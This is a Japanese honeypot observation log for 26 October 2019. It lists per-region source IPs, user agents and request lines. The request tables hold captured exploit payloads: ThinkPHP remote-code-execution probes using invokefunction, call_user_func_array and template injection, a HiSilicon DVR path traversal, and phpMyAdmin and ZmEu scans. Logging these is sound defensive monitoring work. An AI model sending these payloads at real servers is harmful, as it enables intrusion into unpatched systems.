ハニーポット(仮) 観測記録 2019/10/26分です。
特徴
Region:AP
ThinkPHPの脆弱性を狙うアクセス (今までとは違ったパターンも観測しました)
Shenzhen TVT製品の脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
Dockerfileに対するアクセス
を確認しました。
Region:US
HiSilicon DVR Devicesの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス (今までとは違ったパターンも観測しました)
Shenzhen TVT製品の脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
ZmEuによるスキャン行為
を確認しました。
Region:EU
Dockerfileに対するアクセス
phpMyAdminに対するスキャン行為
ZmEuによるスキャン行為
を確認しました。
他
アクセス数推移
AP:総アクセス数:71 (前日比:+58)
US:総アクセス数:91 (前日比:-141)
EU:総アクセス数:13 (前日比:+8)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Region:AP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 108.210.130.114 | United States |
4 | 122.51.64.238 | China |
1 | 139.199.170.242 | China |
1 | 159.203.196.79 | United States |
45 | 185.128.41.50 | Switzerland |
2 | 185.31.163.237 | Russia |
1 | 193.188.22.76 | Russia |
1 | 201.111.50.191 | Mexico |
1 | 201.124.96.224 | Mexico |
4 | 24.193.76.19 | United States |
1 | 37.34.155.11 | Kuwait |
1 | 61.219.11.153 | Taiwan |
1 | 66.249.71.121 | United States |
1 | 81.40.113.29 | Spain |
5 | 82.119.104.180 | Slovakia |
1 | 82.62.129.62 | Italy |
UserAgent一覧
件数 | UserAgent |
---|---|
3 | - |
10 | ApiTool |
1 | curl/7.47.0 |
1 | Go-http-client/1.1 |
45 | Java/1.8.0_131 |
1 | Mozilla/5.0 |
1 | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 |
3 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | GET | /Dockerfile | HTTP/1.1 |
1 | GET | /Dockerfile | HTTP/1.1\n |
1 | GET | /editBlackAndWhiteList | HTTP/1.1 |
3 | GET | /index.php | HTTP/1.1 |
6 | GET | /index.php?s=captcha | HTTP/1.1 |
1 | GET | /index.php?s=index/index/index | HTTP/1.1 |
1 | GET | /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1]=phpinfo() | HTTP/1.1 |
1 | GET | /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /index.php?s=/index/\\think\\request/cache&key=1 | phpinfo|HTTP/1.1 |
1 | GET | /index.php?s=index/\think\Request/input&filter=phpinfo&data=1 | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\view\driver\Php/display&content=<%3fphp+phpinfo()%3b%3f> | HTTP/1.1 |
1 | GET | /mysql/admin/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/dbadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/mysqlmanager/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/sqlmanager/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyadmin/index.php?lang=en | HTTP/1.1 |
3 | GET | /public/index.php | HTTP/1.1 |
3 | GET | /public/index.php?s=captcha | HTTP/1.1 |
1 | GET | /public/index.php?s=captcha&test=1 | HTTP/1.1 |
1 | GET | /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1]=phpinfo() | HTTP/1.1 |
1 | GET | /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /public/?s=captcha | HTTP/1.1 |
1 | GET | /public/?s=captcha&test=1 | HTTP/1.1 |
1 | GET | /public/?s=index/index/index | HTTP/1.1 |
1 | GET | /public/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /public/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /public/?s=index/\think/module/aciton/param1/${%40print(THINK_VERSION)} | HTTP/1.1 |
1 | GET | /public/?s=index/\think\module/action/param1/${%40phpinfo()} | HTTP/1.1 |
1 | GET | /public/?s=index/\think\Module/Action/Param/${%40phpinfo()} | HTTP/1.1 |
1 | GET | /public/?s=/index/\\think\\request/cache&key=1 | phpinfo|HTTP/1.1 |
1 | GET | /public/?s=index/\think\Request/input&filter=phpinfo&data=1 | HTTP/1.1 |
1 | GET | /public/?s=index/\think\view\driver\Php/display&content=<%3fphp+phpinfo()%3b%3f> | HTTP/1.1 |
1 | GET | /robots.txt | HTTP/1.1 |
3 | GET | /?s=captcha | HTTP/1.1 |
1 | GET | /?s=index/\think/module/aciton/param1/${%40print(THINK_VERSION)} | HTTP/1.1 |
1 | GET | /?s=index/\think\module/action/param1/${%40phpinfo()} | HTTP/1.1 |
1 | GET | /?s=index/\think\Module/Action/Param/${%40phpinfo()} | HTTP/1.1 |
1 | GET | /thinkphp/library/think/Request.php?c=exec&f=phpinfo&&_method=filter& | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /webdav/ | HTTP/1.1 |
10 | POST | /editBlackAndWhiteList | HTTP/1.1 |
1 | POST | /TP/index.php?s=captcha | HTTP/1.1 |
1 | \x03 |
Region:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
10 | 112.29.140.213 | China |
1 | 113.161.80.254 | Vietnam |
10 | 115.159.122.71 | China |
1 | 115.163.140.148 | Japan |
7 | 153.126.205.162 | Japan |
12 | 157.245.241.112 | United States |
45 | 185.128.41.50 | Switzerland |
1 | 47.41.47.93 | United States |
1 | 51.254.196.14 | France |
3 | 89.248.169.17 | Netherlands |
UserAgent一覧
件数 | UserAgent |
---|---|
6 | - |
1 | ApiTool |
2 | Go-http-client/1.1 |
45 | Java/1.8.0_131 |
18 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 |
18 | ZmEu |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
3 | |||
2 | GET | /elrekt.php | HTTP/1.1 |
2 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | HTTP/1.1 | |
5 | GET | /index.php | HTTP/1.1 |
6 | GET | /index.php?s=captcha | HTTP/1.1 |
1 | GET | /index.php?s=index/index/index | HTTP/1.1 |
1 | GET | /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1]=phpinfo() | HTTP/1.1 |
1 | GET | /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
3 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /index.php?s=/index/\\think\\request/cache&key=1 | phpinfo|HTTP/1.1 |
1 | GET | /index.php?s=index/\think\Request/input&filter=phpinfo&data=1 | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\view\driver\Php/display&content=<%3fphp+phpinfo()%3b%3f> | HTTP/1.1 |
1 | GET | login.cgi | HTTP/1.0 |
1 | GET | ../../mnt/custom/ProductDefinition | HTTP |
2 | GET | /myadmin/scripts/setup/php | HTTP/1.1 |
1 | GET | /myadmin/scripts/setup.php | HTTP/1.1 |
3 | GET | /MyAdmin/scripts/setup.php | HTTP/1.1 |
3 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
3 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
3 | GET | /pma/scripts/setup.php | HTTP/1.1 |
5 | GET | /public/index.php | HTTP/1.1 |
3 | GET | /public/index.php?s=captcha | HTTP/1.1 |
1 | GET | /public/index.php?s=captcha&test=1 | HTTP/1.1 |
1 | GET | /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1]=phpinfo() | HTTP/1.1 |
1 | GET | /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /public/?s=captcha | HTTP/1.1 |
1 | GET | /public/?s=captcha&test=1 | HTTP/1.1 |
1 | GET | /public/?s=index/index/index | HTTP/1.1 |
1 | GET | /public/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /public/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 | HTTP/1.1 |
1 | GET | /public/?s=index/\think/module/aciton/param1/${%40print(THINK_VERSION)} | HTTP/1.1 |
1 | GET | /public/?s=index/\think\module/action/param1/${%40phpinfo()} | HTTP/1.1 |
1 | GET | /public/?s=index/\think\Module/Action/Param/${%40phpinfo()} | HTTP/1.1 |
1 | GET | /public/?s=/index/\\think\\request/cache&key=1 | phpinfo|HTTP/1.1 |
1 | GET | /public/?s=index/\think\Request/input&filter=phpinfo&data=1 | HTTP/1.1 |
1 | GET | /public/?s=index/\think\view\driver\Php/display&content=<%3fphp+phpinfo()%3b%3f> | HTTP/1.1 |
3 | GET | /?s=captcha | HTTP/1.1 |
1 | GET | /?s=index/\think/module/aciton/param1/${%40print(THINK_VERSION)} | HTTP/1.1 |
1 | GET | /?s=index/\think\module/action/param1/${%40phpinfo()} | HTTP/1.1 |
1 | GET | /?s=index/\think\Module/Action/Param/${%40phpinfo()} | HTTP/1.1 |
2 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /thinkphp/library/think/Request.php?c=exec&f=phpinfo&&_method=filter& | HTTP/1.1 |
2 | GET | /TP/html/public/index.php | HTTP/1.1 |
2 | GET | /TP/index.php | HTTP/1.1 |
2 | GET | /TP/public/index.php | HTTP/1.1 |
3 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
1 | GET | /wp-login.php | HTTP/1.1 |
1 | POST | /editBlackAndWhiteList | HTTP/1.1 |
2 | POST | /index.php?s=captcha | HTTP/1.1 |
Region:EU
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
7 | 153.126.205.162 | Japan |
1 | 185.31.163.237 | Russia |
1 | 23.239.12.17 | United States |
4 | 71.6.199.23 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
5 | - |
1 | Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 |
1 | python-requests/2.19.1 |
6 | ZmEu |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | GET | /Dockerfile | HTTP/1.1\n |
1 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /HNAP1/ | HTTP/1.1 |
1 | GET | HTTP/1.1 | |
1 | GET | /myadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /MyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /pma/scripts/setup.php | HTTP/1.1 |
1 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /sitemap.xml | HTTP/1.1 |
1 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
1 | GET | /.well-known/security.txt | HTTP/1.1 |